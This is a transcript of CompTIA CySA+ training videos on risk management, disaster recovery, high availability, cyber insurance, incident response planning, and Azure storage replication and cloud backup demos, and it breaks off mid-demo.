networking, IT security, cloud solutions, Linux management and configuration, and troubleshooting across a
wide array of Microsoft products. The (CS0-002) CompTIA Cybersecurity Analyst, or CySA+ certification
exam, is designed for IT professionals looking to gain security analyst skills to perform data analysis to
identify vulnerabilities, threats, and risks to an organization, to configure and use threat detection tools, and
secure and protect an organization's applications and systems. In this course, we're going to explore risk
identification and prioritization that will aid in the planning of secure IT systems and data and to reduce the
impact of business disruptions.
I'll start by examining structured risk management frameworks, talk about the importance of a risk register,
various risk treatments. I'll then explored disaster recovery strategies, solutions that provide high availability,
and cyber security insurance as a form of risk transference. Next, I'll examine the characteristics of a business
continuity plan and business impact analysis, otherwise called a BIA. Talk about how to proactively design an
incident response plan and post-incident activities. I'll then demonstrate how to enable Microsoft Azure storage
account replication, how to register a Windows Server with Azure for backup, and how backups provide
availability through recovery. Lastly, I'll explore how to create a MySQL database read replica in a secondary
geographical region.
Upon completion of this video, you will be able to recall how structured risk management frameworks work.
Objectives
[Video description begins] Topic title: Risk Management. Your host for this session is Dan Lachance. [Video
description ends]
Cyber security is all about proper risk management. And there are plenty of other activities that are related to
this such as penetration testing, which is used to prove that risks are real and can have a negative impact on an
organization.
NIST Special Publications 800-37 and 53 are all about security controls, which are used to mitigate threats, to
determine how effective they are, how they should be configured and how they should be replaced over time,
because as we know, continuous monitoring will eventually shed light on the fact that security controls that
once secured an asset properly may no longer be as effective. ISO/IEC 31000:2009 deals with risk
management. Now, this risk management framework can be used for any size of organization or any type,
whether it'd be profit or non-profit or government agency based. The idea is to balance activities within the
organization that serve business objectives and risk treatments. Now risk treatments would include things like
risk acceptance and risk transfer. An example of risk transfer might be the acquisition of cyber security
liability insurance.
So, with assets and risks, we have to first identify the assets, assign values to them, and then determine who the
custodians of those assets are. A data custodian, for example, would be the individual or the team that's
responsible for securing the storage of data in alignment with business rules. The next thing to do is to identify
risks to those assets and then look at the security controls.
So, therefore, the IT asset lifecycle begins with planning and procurement, that means looking at the assets that
are in place and then deploying security solutions, then operating and supporting solutions including applying
updates. Now the updates could be a part of hardening at the firmware or at the software levels. And then we
have the eventual decommissioning of the IT asset. So, an IT asset could be data, or it could be a specific IT
system that results in data that has value to the organization. Now when you're looking at applying security
countermeasures against risks, you have to think about the cost factor.
So, there are a number of asset risk calculations that we need to consider. Now first of all, let's talk about
terminology. The exposure factor or EF is the percentage of an asset that might be affected by a single negative
event, where the single-loss expectancy or the SLE, the S-L-E, is the cost associated with a single negative
event, so the entire cost. Then we've got the annual rate of occurrence, the ARO, A-R-O. So, how many times
per calendar year can we expect a negative incident to occur? And finally, we have the annualized loss
expectancy or the ALE. This is calculated by multiplying the annual rate of occurrence by the single-loss
expectancy. Now why would we care about this? We care about the ALE because this gives a cost. It lets us
quantify how much money we should be willing to spend to secure an asset on an annual basis compared to the
expected potential loss. So, we have to remember that when we're looking at things like let's say a server, an e-
commerce server, it's not really the server itself that's valuable, but rather, the data that it processes or perhaps
even stores, if that e-commerce data is stored on that host. So, let's do a calculation example.
[Video description begins] Asset Risk Calculation Example. [Video description ends]
Let's say we've got a database that's been valued by the organization at $500,000. And let's say that database
security breach wise, we can expect that we could have maybe a 5% data value loss when a single incident
occurs. Now we might derive this from past historical logged incidents. So, in this case, we would have an
exposure factor or an EF of 0.05. So, that's the 5%. Next, we can calculate the single-loss expectancy. That's
the asset value, the AV, in this case $500,000 multiplied by the exposure factor, so 5%, which results in
$25,000, single-loss expectancy. Now let's say that based on past historical logged incidence, we can expect a
security breach once every two years. So, the annual rate of occurrence or the ARO is 0.5. And so, once a year,
it will be 1, so 0.5 in this case. Now we can do some calculations. So, the annual loss expectancy or the ALE
equals the ARO times the SLE. So, that would be 0.5 in this case, times 25,000. Now, when we take a look at
the result, we get $12,500. What does that mean? It means, on an annual basis, we should never exceed
$12,500 in security mitigations to protect our database asset that's been valued at $500,000.
After completing this video, you will be able to understand the importance of a risk register.
Objectives
[Video description begins] Topic title: Risk Register. Your host for this session is Dan Lachance. [Video
description ends]
There is no such thing as an organization that is not exposed to some level of risk. And this is true regardless of
industry, regardless as to whether it's a government agency, private sector, profit, nonprofit, it doesn't matter.
So, risk management means taking a look at the enterprise risk, which could be broken down into many
different categories, such as strategic risk, environmental risk, market risk, credit risk on the finance side,
operational risk, and compliance risk, when it comes to complying with security frameworks or standards or
regulations, which will vary in different parts of the world, depending on the type of asset you're talking about,
such as sensitive data. All of these different categories of risk are supported by some kind of an IT ecosystem.
Servers, storage arrays, routers, network equipment, and, of course, the actual data that's being stored and
perhaps replicated, even across national boundaries. So, all of this ends up being IT-related risk in the modern
world. And that's why it's so important to have a proper IT governance risk management framework in place.
Now, part of doing that involves having a risk register.
In this video, you will learn how to apply various risk treatments to risks.
Objectives
[Video description begins] Topic title: Risk Treatments. Your host for this session is Dan Lachance. [Video
description ends]
When organizations undertake new endeavors, whether it's partnering with another business for a government
contract or whether it's beginning the migration of on-premises services to the cloud, whatever it happens to
be, there is risk involved.
And an important part of working with risk and managing it properly in an organization is determining the
organizational risk appetite. What kind of impacts is the organization ready to accept should a risk materialize?
And so, part of this is also going to be related to defining a risk owner who is responsible if threats or risks
materialize and have a negative impact on the business. So, there are a number of risk treatments then that can
be applied, depending on the nature of the risk that's involved and the organizational's risk appetite. The first is
risk acceptance. We also have risk avoidance. With risk acceptance, which is also called risk retention, it
means that the risk is known to the organization and loss, should it occur, is acceptable. This also means that
we have to think about risk avoidance, because what if the loss is unacceptable? What if it's so risky that even
the gains aren't worth it? Well, then, that would be risk avoidance. Well, risk is not even transferred to another
party. Really the organization simply does not engage in the activity or the project because the risk is
unacceptable. So, you've got risk acceptance versus risk avoidance. Now, risk acceptance happens all of the
time. For example, if you're an investor and you invest in the stock market, the risk you're taking is that
companies that you buy stock in could simply declare bankruptcy, which means your investment vaporizes.
But the financial gains might be worth it, hence risk acceptance.
There are other risk treatments, like risk reduction and risk transfer. Risk reduction is a big focus of risk
management frameworks because we're talking about putting things in place to reduce or lessen risk frequency
and the impact it has on the organization. So, in other words, risk mitigation. This means implementing a risk
management framework and continuously monitoring security controls put in place to manage the risk,
because they might need to be changed over time. Risk transfer is also called risk sharing. And this is a risk
treatment option that might be applicable when risk mitigation isn't feasible. So, this means outsourcing.
Examples of this, imagine that we want to outsource some of our on-premises data storage or IT systems out to
the Cloud, or we want to hire subcontractors to do some kind of IT work, or we decide to purchase
cybersecurity insurance for protection should a data breach, for example, occur. Not only to replace missing
data, but also to deal with third-party litigation against the organization as a result of things like data breaches.
So, despite all of these risk treatments that an organization might consider and manage, there will always be
some kind of a residual risk still remaining.
In this video, find out how to maintain business continuity during unexpected disruptions.
Objectives
[Video description begins] Topic title: Disaster Recovery Strategy. Your host for this session is Dan
Lachance. [Video description ends]
An important aspect of every organization's security posture is how it plans ahead of time proactively for
negative incidents that might occur, to reduce their impact.
This is all about disaster recovery, business continuity to make sure that business processes and the underlying
IT systems are kept running all the time, and that the data is available. So, high availability is an important
aspect of security.
Now there are a number of disaster recovery strategies and things to consider, like the recovery time objective
or the RTO. The recovery time objective is expressed in time, such as hours, and it represents the maximum
acceptable amount of downtime. For example, for an e-commerce server, maybe the RTO is four hours.
Beyond that, there are unacceptable consequences to the organization. And so our disaster recovery strategy
has to keep that in mind. In our example, the e-commerce server needs to be up and running within four hours.
The recovery point objective or RPO, is also expressed in time. But the RPO is more related to the maximum
tolerable amount of data loss. Again, if that were set at four hours, it would mean that we would have to make
sure that we are taking backups of that data that has an RPO of four hours at least once every four hours.
Service level agreements or SLAs are contractual documents between a provider of a service and a consumer
of a service. Whether it's within an organization or maybe with a public cloud provider, it guarantees uptime.
And that's an important part of a disaster recovery strategy for an organization to look at the SLA for various
services that it depends on. And then there’s clustering and load balancing.
The idea with clustering and load balancing is to have more than one backend server supporting an application.
Now more often than not, those servers will be in the form of virtual machines that might run on-premises in a
data center or in a public cloud provider environment. Now on the load balancing side, we have one entry point
essentially to the application, that would be the load balancer. It takes client requests in and it determines
which backend server that request would be routed to. That way we get the performance benefit, as well as
high availability because if one back-end virtual machine goes down, there are others that can pick up the slack
because they are also supporting the same application. So, what else can we do in terms of disaster recovery to
ensure availability of IT systems and data? Well, these days what's happening more and more is organizations
are looking at using public cloud provider infrastructure as an alternate disaster recovery site, or DR site. This
is often referred to as Disaster Recovery as a Service, or DRaaS. Now that could involve doing things like
replicating on-site systems and data into the cloud. So, if something happens to your on-premises environment,
you've got it stored elsewhere.
The great thing about the public cloud, is you're essentially renting it, you're paying for what you're using.
There's no upfront capital investment as there would be if you were to invest in your own custom disaster
recovery alternative site. It's also scalable due to all of the resources available in the cloud, so if you need more
and more storage, it will be available. Then we've got data replication to alternate regions. So, you might take,
for example, a database and create a replica, store it in another physical region. So, if there's some kind of a
disruption in the primary region, you've already got an up-to-date copy of the data elsewhere. Not only is it
important to ensure that we back up data, but also the configuration of complex IT systems. The idea is to
make sure that we adhere to the RTO or the recovery time objective to get failed systems up and running as
quickly as possible. Another aspect of disaster recovery would be offline backup storage. Now, why would we
want to do that? Well, in one word, ransomware.
Ransomware can infect a machine and all of the data, it has right to access through by encrypting it. And
unless the ransom is paid, decryption key is not provided. And there's never a guarantee it will be anyway even
if payment is received. And so, having backups stored offline means that, in the event of a ransomware
infection, you still have a recent copy of data that has not been infected. Now there's still a cost associated with
this, in terms of restoring systems and data back to a functional state, but often it's better than paying a ransom.
Learn how to define which types of solutions provide high availability for IT systems and data.
Objectives
define which types of solutions provide IT system and data high availability
[Video description begins] Topic title: High Availability. Your host for this session is Dan Lachance. [Video
description ends]
Applications are at the core of IT system use that result in important data. Whether it's an application used to
validate drivers licenses online or to determine the tax owing for a corporation or an individual, or whether it's
an e-commerce website. These things are important. And so, it's important that we think about high availability
and load balancing for applications to ensure their continued uninterrupted processing. So, performance is
important.
[Video description begins] High Availability - Load Balancing [Video description ends]
High availability and load balancing in terms of performance means having multiple back-end virtual
machines serving the same app. It's highly available because if one of those virtual machines goes down, there
are others that are already up and running that can serve client requests. It's scalable in that if we have a peak
in demand for an application, and we've got a load-balanced solution, it can be configured for Auto-scaling,
especially in the cloud. So, that as things get busier, we can add virtual machine instances to support the app.
Now we can also configure scaling so that we remove virtual machine instances when things quiet down.
Scaling out means adding VMs, scaling in means removing them to save on costs. So, this is Auto-scaling.
Pictured on the screen we have an example of a load-balanced environment, where a client device would
connect to a URL pictured here as www.quick24x7.com. Now that needs to resolve to an IP address and it
would resolve to the load balancer's IP address. Here we're calling it the load balancer public IP address. So,
presumably we've got a public load balancer that's available to the outside. You can also have internal load
balancers for internal applications used by employees. So, at this point, the request will be routed to the most
responsive and healthy back-end virtual machine.
When you configure a load-balanced solution, you determine whether it's public or private as we've mentioned.
You can also determine if it's just an HTTP type of application, or HTTPS, if it's been secured with a PKI
certificate. Now we're not saying it has to be an HTTP based application because it does not have to be, you
can load balance pretty much anything. So, you could base it on a TCP or a UDP port number. You can also
use TLS, which, of course, is an HTTPS connection to secure and encrypt network communications for a
network load balancer.
Now an application load balancer and a network load balancer are similar, but there is a difference. One being
that an application load balancer is usually based on the HTTP protocol. And it's a little bit different in that
where a network load balancer normally looks only at port numbers, an application load balancer can actually
look at a URL. An incoming URL for an app and make a back-end VM routing decision based on the URL.
So, if the URL includes streaming video, it might direct that request to a back-end group of servers that are
optimized for streaming video. Then there are Firewall ACL or access control list rules that can control what
traffic is allowed into and out of the load-balanced solution. The load balancer can also be configured with
back-end VM health checks. So, that perhaps every five minutes or every one minute, it'll probe a specific port
in each back-end VM. And if it doesn't get a response within a given threshold, it will flag it as being
unhealthy. And so client requests would then not be routed to those back-end VMs.
[Video description begins] High Availability - Data. [Video description ends]
High availability also applies to data. This relates to the recovery point objective or the RPO. Remember that
the RPO denotes the maximum tolerable amount of data loss. So, maybe the organization cannot tolerate more
than four hours of data loss. So, we have to make sure our backups occur at least once every four hours. So,
this is related to backup, we could also replicate data to alternate locations for safekeeping. The RTO, or the
recovery time objective, remember, relates to the maximum amount of downtime. So, this relates to our
incident response plan to get things up and running as quickly as possible back to a functional state. It could
also include things like backup power generators. In the event that we lose power, there's a power disruption
on the power grid. Or having duplicate network connections to the public cloud if we have a dependency from
on-premises, to public cloud provider services.
After completing this video, you will be able to describe how cybersecurity insurance is a form of risk transfer.
Objectives
[Video description begins] Topic title: Cybersecurity Insurance. Your host for this session is Dan
Lachance. [Video description ends]
What you're looking at on your screen is the search result for cyber insurance.
[Video description begins] A cyber insurance - Bing web page is open in the web browser. It is divided into
two parts. The first part includes a search bar and three tabs labeled "cyber insurance", "cyber liability", and
"cyber business interruption insurance". The second part is a content pane. The second part includes the
information about the search result for cyber insurance. [Video description ends]
And we can see there are variations here, such as cyber liability insurance, cyber business interruption
insurance. In this day and age, a lot of organizations might look to this. And really it's just a form of risk
transference to the insurance company when negative cyber security events occur. Whether it's a data breach or
a malware infection or a server being down for a long time, infecting customers. So, if we scroll down, let's say
I click on this link for Protect your organization from cyber crime.
[Video description begins] He clicks a link labeled "Protect your organization from cyber crime". The web
page labeled "IBC BAC" opens in the web browser. It is divided into two parts. The first part includes options
labeled "Auto", "Home", and "Business". The second part is the content pane. It is divided into several
sections. It includes sections labeled "Types of cyber attacks", "Six questions to consider when buying cyber
insurance", and "What can cyber insurance cover". [Video description ends]
An important part of looking at cyber security insurance is knowledge, looking at the details.
[Video description begins] He points to the "Types of cyber attacks" section. [Video description ends]
For example, so we go further down, the types of cyber attacks that might occur, Denial of service attacks,
Phishing attacks, Malware, Ransomware, Spoofing or impersonation, Brute force, where attackers might use a
password cracking program to keep trying to break into accounts that might be using weak passwords. Then, of
course, there are six questions, it says here, to consider when you buy cyber insurance.
[Video description begins] He points to the "Six questions to consider when buying cyber insurance"
section. [Video description ends]
So what kind of data do we have, like sensitive personal data? Do all portable media and computing devices
need to be encrypted? Down below, What can cyber insurance cover?
[Video description begins] He points to the "What can cyber insurance cover" section. [Video description
ends]
So, Legal and civil damages, Security breach remediation, so, the costs of getting things back up and running
after some kind of an attack, such as a ransomware infection. Even if you don't pay the ransom to potentially
receive a decryption key when ransomware occurs, often machines might need to be reimaged with an
operating system image. And then data restored from a backup prior to the ransomware infection, that takes
time and effort, it requires IT personnel. There's a cost associated with it. And so, even on the notification side
when a data breach or a security breach has occurred, cyber liability insurance can also deal with that.
[Video description begins] He highlights the subsection labeled "Security breach remediation and notification
expenses" in the "What can cyber insurance cover" section. [Video description ends]
The other thing to consider when you think about cybersecurity insurance is, if there is the possibility of a
reduction in premiums, if the organization can demonstrate that it is compliant with security standards or
frameworks or regulations.
After completing this video, you will be able to describe common characteristics of a business continuity plan,
a business impact analysis, and related insurance options.
Objectives
describe common characteristics of a business continuity plan, BIA, and related insurance options
[Video description begins] Topic title: Business Continuity and Business Impact Analysis. Your host for this
session is Dan Lachance. [Video description ends]
[Video description begins] Disaster Recovery Plan (DRP). [Video description ends]
It is a part of the overall business continuity plan, or BCP. The BCP, at a higher level, is concerned with
keeping business processes running. Disaster recovery plan is a little more specific on exactly how to recover a
failed system. Now, incident examples that might cause us to kick in the disaster recovery plan would be a
crashed e-commerce website, or a remote data center that's no longer reachable, or data corruption, or even
fire. Now, at this point, we have to distinguish the difference between a disaster recovery plan and an incident
recovery plan. Well, the real big difference is timing. The incident recovery plan is effective while the incident
is occurring. And, ideally, to contain and eradicate it. Whereas, the disaster recovery plan is really more after
the incident has occurred, how can we quickly restore operations or business processes?
So, disaster recovery planning includes thinking of things like the RTO and the RPO. The RTO is the recovery
time objective, it's the maximum tolerance for downtime. It allows us to have a model or a framework to work
in, within which, that time frame, we have to bring the systems back online or get data recovered quickly. It
also can include time to move operations to an alternate site. Now, these days, that's not so much a physical
task, alternate sites are often a duplicative of on-premises IT systems and data that we might have running in
the cloud that would kick in if there's a disruption or some kind of a disaster on-premises.
The recovery point objective, or RPO, is related to the maximum tolerance for data loss. So, this really deals
with how often backups should be taken. And what kind of assets we should focus on for backups, such as
finance servers versus file servers that simply contain replaceable documentation. The other aspect of disaster
recovery planning is looking at the reliability of hardware and software systems. For example, the mean time
to repair, or MTTR. and the mean time between failure, or MTBF, are important items to consider. The MTTR
deals with the average time it takes to restore something back to a functional state. So, it deals with things like
equipment reliability. And over time, the more mature a system, it doesn't have to be one piece of hardware,
could be an overall IT solution, but the more mature that solution, the less time that will be required for
restoration. The reason for this is because the more mature a system becomes, the more we've had time to deal
with incidents and to kind of hone the skills required to restore that item back to a functional state.
The MTBF is the failure rate average. It's an availability percentage, that's how it's actually expressed. And it's
calculated by taking the MTBF divided by the MTBF plus the MTTR times 100. Now, as an example, let's
plug in some numbers. Let's say that we are talking about a website and we're concerned about its reliability
because it's a revenue generating website for the organization. Let's say, based on past historical records, the
website comes down approximately once every 250 days. So, that works out to be 6000 hours, that's where the
6000 comes from here. And let's say that when that server does come down, approximately once every 250
days, it takes about four hours to get it up and running again. That's where the four comes from. So, when we
plug in those numbers into our formula, we are left with 99.93%. That expresses the availability of that web
server that is revenue generating. It's 99.93% available, that amount of the time.
[Video description begins] Disaster Recovery Plan Document. [Video description ends]
The disaster recovery plan document is usually for a specific service or system. It will include the recovery
objective, the scope of what the disaster recovery plan covers, whether it's a specific revenue generating
website or whether we're talking about an entire site. Also the DRP team members and their responsibilities
will be documented in the DRP. There will also be contact information, such as if there's a problem and we
can't recover it, by following the DRP, who should we escalate this to? Contact information is crucial in the
disaster recovery plan. So, that deals with escalation details. All of this falls into security, because an important
aspect of security is the availability of systems and data.
During this video, you will learn how to design a plan that outlines the response to disruptions.
Objectives
[Video description begins] Topic title: Incident Response Plan. Your host for this session is Dan
Lachance. [Video description ends]
Incident handling is all about planning ahead of time for how to respond to and manage unplanned business
disruptions.
So, this is really about business continuity recovery time objectives, or RTOs, to get things up and running as
quickly as possible when there are disruptions. So, the incident response plan, or the IRP, then, is a document
or a set of documents that must be known by the appropriate parties to recover from a disruption quickly.
Now, the next thing we have to think about is the incident response lifecycle. At some point initially, the
incident response plan, or the IRP, needs to be created. Now because there should be a continuous monitoring
of security controls and, of course, continuous monitoring of incident history, that means we'll have to update
the incident response plan over time, especially as new threats emerge so we can learn from past incidents.
Now we need to identify and respond to security incidents in alignment with the created incident response
plan, the IRP. After which the problem can be eradicated and recovered. And then we can update the IRP once
again. Now, identifying and responding to incidents can also be automated. An example of this would be using
an intrusion prevention system, an IPS, that might be configured to look for security incidents, such as
offensive traffic from a specific network or host and blocking that IP address as required. Now, whenever you
update an incident response plan, you need to make sure that you document the nature of the update and when
it occurred. There needs to be a revision history at the beginning of the incident response plan.
[Video description begins] Incident Response Plan Components. [Video description ends]
Now, the components within the incident response plan would include things like the security operations
center, or the SoC team members, and their responsibilities. You need to have people that take responsibility
for specific IRPs and know what their job role is when incidents occur. This way, issues can be resolved as
quickly as possible. The other thing is having a contact list. So, for example, the incident command system, or
ICS, is a standard way to coordinate how incidents are responded to, especially across multiple security
operations center teams. It's also important that there is a response checklist that is adhered to when an incident
occurs. And in this case of an incident that might jeopardize the safety of personnel and assembly areas, such
as when fires break out. And there might also be legal disclosure requirements whereby we have to have a
contact list, perhaps for legal and public relations to disclose that an incident has occurred. This would be
something that would be very important with organizations that have data breaches related to customer
sensitive information. Now the incident response plan has to have a containment strategy component. What are
we going to do when an incident occurs? So, for example, if there's a malware outbreak, what's the response?
Maybe it's to isolate that device or network, or if an incident is that we've got a data security breach due to the
fact that there were missing patches that were not applied, then part of the containment is going to be to apply
those patches immediately. It's important to consider running periodic drills, so that team members know what
their role is and how it all fits together when responding to incidents.
[Video description begins] Incident Response Plan (IRP). [Video description ends]
The incident response plan needs to be in effect naturally before incidents occur, it should not be an
afterthought. What can be an afterthought is making updates from lessons learned when incidents occur. Now,
what about if we don't have an adequate incident response plan, or it's not updated periodically, or there are no
drills with team members? Well, some of the effects can be nasty. It can have a financial effect against the
organization, there can be reputation loss, it can result in the loss of business partnerships and so on. And so,
there needs to be at minimum an annual review of incident response plans to keep up with changing threats.
Find out how to benefit from lessons learned during incident response.
Objectives
[Video description begins] Topic title: Post Incident Activities. Your host for this session is Dan
Lachance. [Video description ends]
A cybersecurity analyst must be concerned with more than just using hacking tools, and firewall rules, and
patching operating systems, and so on. There's also making sure that we take steps proactively to eliminate or
at least reduce the impact of incidents. And that's where post incident activities comes in. So, what do we do
after a negative incident has occurred and the problem has been contained? Well, at this time, it's really about
reflection on how to make things better in the future by looking at lessons learned from the incident response.
Was is it effective in containing the incident efficiently? And then, of course, looking at the root cause. How
did the incident occur in the first place? Because the overall purpose here is to either completely eliminate the
re-occurrence of the incident or reduce its impact in the future. We don't want these things happening again.
Now part of this is documentation.
[Video description begins] Post Incident Review Form Example. [Video description ends]
The organization needs to have a post-incident review form. Now here, we have an example where the
company name is at the top, Quick24x7. And we've got a confidentiality level that might be set, in this case,
let's say high. We have the date of the incident and a description of the incident. In this case, it's a user, laptop,
and the date of files on it being encrypted with the ransomware variant WannaCry. So, what was the cause of
this? We have to do some investigation to be able to properly populate this post-incident review form. The root
cause might be that the user opened an infected email message. The incident scope, what was affected? Might
be just the user laptop when they were connected to a public Wi-Fi network? Who are the incident response
technicians, and which remediation steps were taken to resolve the issue? And you might even include how
long it took for that to happen. This is absolutely valuable information because by having a historical record of
what was done when incidents occurred, we can always improve the process, to make it more efficient in terms
of timing and even in terms of cost effectiveness.
So, post-incident activities then can also include looking at indicators of compromise when incidents occurred.
So, maybe the incident of compromise or the indicator of compromise reflects the fact that we have a machine
that was infected with the ransomware. Depending on the nature of the incident, in our case, there was no real
crime committed. But if there is, then evidence retention in accordance with the chain of custody to properly
watch over and govern evidence would be applicable.
Post-incident activities include updating the incident response plan from lessons learned to improve it and
make it efficient, to update or maybe that would trigger a new round of training to deal with that incident for
security personnel. And also perhaps updating organizational security policies to prevent things from
happening, such as having user training and awareness on a periodic basis so people are aware that they
shouldn't be clicking on suspicious file attachments in email messages. There also needs to be an incident
summary report. That's part of what the incident response form, the post-incident response form feeds into.
And as always, with security, there needs to be continuous monitoring of post-incident activities to ensure
they're effective with a continuous desire to improve and make more efficient the incidence response plan.
[Video description begins] Topic title: Cloud Storage Replication. Your host for this session is Dan
Lachance. [Video description ends]
In this demonstration, I will be enabling Cloud Storage Replication. Specifically, I'll do it with the storage
account in the Microsoft Azure Cloud. So, to get started here, I've already got an account and I've signed in to
the Microsoft Azure portal, the GUI Management Tool.
[Video description begins] The Microsoft Azure portal is open. It is divided into two parts. The first part
includes a search bar. The second part is a content pane. It includes a section labeled "Azure services". It
further includes options labeled "Create a resource" and "Virtual machines". [Video description ends]
So, I'm going to click Create a resource, because I want to create a storage account.
[Video description begins] He clicks the "Create a resource" option and a page labeled "New" opens in the
content pane. It includes a search bar. [Video description ends]
So, I'll search for storage account, and I'll select it from the list, and I'll choose the Create button.
[Video description begins] He types the text "storage account" in the search bar and selects the search option
labeled "Storage account - blob, file, table, queue". A page labeled "Storage account - blob, file, table, queue"
opens in the content pane. It includes a button labeled "Create". [Video description ends]
One of the things I'll have to specify when I create the storage account is the Resource group into which it is
deployed.
[Video description begins] He clicks the "Create" button and a page labeled "Create storage account" opens
in the content pane. It is divided into two parts. The first part contains options labeled "Basics", "Networking",
"Advanced", "Tags", and "Review + create". The second part is the content pane. The "Basics" option is
already selected and the corresponding page is open in the content pane. It is divided into three sections. The
first section labeled "Project details". It includes a drop-down option labeled "Resource group". The second
section labeled "Instance details". It includes a textbox labeled "Storage account name" and drop-down
options labeled "Location" and "Replication". The third section includes an option labeled "Next: Networking
>". [Video description ends]
A Resource group is simply a way to organize related cloud resources for management purposes.
[Video description begins] He clicks the "Resource group" drop-down option and the drop-down list opens. It
includes options labeled "RG1" and "RG1-asr". [Video description ends]
[Video description begins] He selects the "RG1" option. [Video description ends]
I'm going to call this storacctyhz1. Down below, the Location, where will this be stored physically?
[Video description begins] He types the text "storacctyhz1" in the "Storage account name" textbox. [Video
description ends]
Now you have to consider regulatory compliance and data sovereignty issues where you might be required to
store cloud-based data within national boundaries.
[Video description begins] He clicks the "Location" drop-down option and the drop-down list opens. It
includes options labeled "(US) East US" and "(US) East US 2". [Video description ends]
In this case, I'm going to leave it with the default selection of (US) East US.
[Video description begins] He selects the "(US) East US" option. [Video description ends]
But down below, I'm interested in the Replication type, because we have a number of options here. For
example, we can choose Geo-redundant storage (GRS).
[Video description begins] He clicks the "Replication" drop-down option and the drop-down list opens. It
includes options labeled "Geo-redundant storage (GRS)" and "Locally-redundant storage (LRS)". [Video
description ends]
[Video description begins] He selects the "Geo-redundant storage (GRS)" option. [Video description ends]
Basically within a physical area, there are three copies of the data, but then after that there's also another copy
of the data to a different location. However, we can do this during the creation of the cloud storage account in
Azure, or after the fact. We're going to do it after the fact just so we can see how we might change it.
[Video description begins] He selects the "Locally-redundant storage (LRS)" option. [Video description ends]
So, I'm going to leave it on the Locally-redundant storage (LRS), which does not copy or synchronize data
across regions. I'll click Next.
[Video description begins] He clicks the "Next: Networking>" button. The "Networking" option gets selected
from the first part and the corresponding page opens in the content pane. It includes a button labeled "Next:
Advanced >". [Video description ends]
I'm going to leave the default for the Networking. I'll click Next again. Same with Advanced, I'll leave all that.
[Video description begins] He clicks the "Next: Tags>" button. The "Advanced" option gets selected and the
corresponding page opens in the content pane. It includes a button labeled "Next: Advanced >". [Video
description ends]
And I'm not going to tag it. I'll click Next : Review + create.
[Video description begins] He clicks the "Next: Tags >" button. The "Tags" option gets selected and the
corresponding page opens in the content pane. It includes a button labeled "Next: Review + create >". [Video
description ends]
So, I'll go ahead and click the Create button to create the storage account. And before too long we'll get a
message about the deployment being complete.
So, I'm going to click the Go to resource button so we can open up the properties of that storage account.
[Video description begins] He clicks the "Go to resource" button. The blade labeled "storacctyhz1" opens. It is
divided into two parts. The first part is the navigation pane. It includes options labeled "Overview" and
"Settings". The "Settings" option further includes options labeled "Geo-replication" and "Configuration". The
"Overview" option is already selected and the corresponding page is open in the content pane. It includes tiles
labeled "Containers" and "File shares". [Video description ends]
Now what I'm interested in here is first of all in the properties of the storage account, we could go into the
details of the storage account such as Containers.
[Video description begins] He clicks the "Containers" tile and the blade labeled "storacctyhz1 - Containers"
opens in the content pane. It is divided into two parts. The first part includes an option labeled "+ Container"
and the second part includes a search bar. [Video description ends]
And we could make folders, so I can click add a container or folder and then upload content. This can also be
done programmatically. So, there are many ways to populate the storage account with actual data. We're not
going to focus on that here, we're more interested in the availability aspect through replication. So, if I were to
scroll down in the left-hand navigator under Settings, I've got a Geo-replication option for this storage account.
[Video description begins] He clicks the "Geo-replication" option from the navigation pane and the
corresponding page opens in the content pane. It includes a world map with a pin labeled "Primary location"
and the text "Locally-redundant storage (LRS) under the heading labeled "Replication". [Video description
ends]
And I can see currently that it's in the US East area. That's where we deployed the storage account, but I don't
have an option to change it. Well, that's because it's currently set as Locally-redundant storage (LRS). So, I'm
going to click the Configuration link over on the left. And from here, among other things, we will have the
option to change the replication strategy. So, currently we can see Replication is Locally-redundant storage,
I'm simply going to change it to Geo-redundant storage, not going to change anything else.
[Video description begins] He clicks the "Configuration" option from the navigation pane and the
corresponding page opens in the content pane. It includes a drop-down option labeled "Replication" and
buttons labeled "Save" and "Discard". [Video description ends]
So, then at the top, I'll just click the Save button and wait for it to take effect. And it says updated the storage
account, it may take up to 30 seconds before it's actually in effect.
[Video description begins] He clicks the "Save button". The pop-up box labeled "Successfully updated storage
account" appears. [Video description ends]
Well, if I click on the Geo-replication link over on the left, we can see that we now have two pinpoints on the
map.
[Video description begins] The page labeled "storacctyhz1 - Geo-replication" opens in the content pane. It
includes a world map with two pins labeled "Primary location" and "Secondary location". It also includes a
table. The table contains two rows and four columns. The column headers labeled "Location", "Data center
type", "Status", and "Failover". It includes the row entries labeled "West US", "Secondary", and "Available"
under the column headers "Location", "Data center type", and "Status", respectively. [Video description ends]
Now, we started off with US East, that's the blue pinpoint, that's where we originally deployed our storage
account. Now we've got one, it appears to be somewhere around California, on the West Coast of North
America. So, if I scroll down, I can see in the legend, indeed, we've got West US as a secondary region where
the contents of the storage account is now being replicated. So, should there be a problem on the East Coast,
we now have or will have an up-to-date replicated copy of data on the West Coast.
In this video, learn how to register a Windows Server with Microsoft Azure for backup.
Objectives
[Video description begins] Topic title: Backing up to the Cloud. Your host for this session is Dan
Lachance. [Video description ends]
Backing up on-premises data to the cloud has become more and more prevalent due to the fact that it's very
simple, cost effective, and it also serves as an off-site backup all together.
[Video description begins] The Microsoft Azure portal opens. It is divided into two parts. The first part
includes a search bar. The second part is the content pane. It includes a section labeled "Recent resources". It
further contains a table. The table contains three columns and five rows. The column headers labeled "Name",
"Type", and "Last viewed". It includes a row entry labeled "Vault1" under the column header "Name". [Video
description ends]
So, to get started here in Microsoft Azure, we're going to be backing up an on-premises file server into the
Microsoft Azure Cloud. Now what needs to be in place first is a Recovery Services vault, which I've already
created, and it's named Vault1. So, I'm going to click on Vault1 to open up its properties.
[Video description begins] He clicks the row entry "Vault1" and a blade labeled "Vault1" opens in the content
pane. It is divided into two parts. The first part is the navigation pane. It includes options labeled "Getting
started" and "Protected items". The "Getting started" option includes a "Backup" option and the "Protected
items" option includes "Backup items" option. [Video description ends]
In the left-hand navigator, down under Getting started on the left, I'm going to click on Backup.
[Video description begins] He clicks the "Backup" option and the corresponding page opens in the content
pane. It is divided into two sections. The first section contains drop-down options labeled "Where is your
workload running?" and "What do you want to backup?". The second section is titled as "Step: Configure
Backup". It contains a button labeled "Backup". [Video description ends]
It asks where the workload is running. For example, we could back up an Azure Virtual machine or an Azure
SQL server and continue on our way by clicking the Backup button. But here, in this case, I'm going to select
On-Premises.
[Video description begins] He clicks the "Where is your workload running?" drop-down option and a drop-
down list opens. It Includes an option labeled "On-Premises". He selects "On-Premises" option. [Video
description ends]
And it asks what I want to back up from On-Premises. We have a number of options.
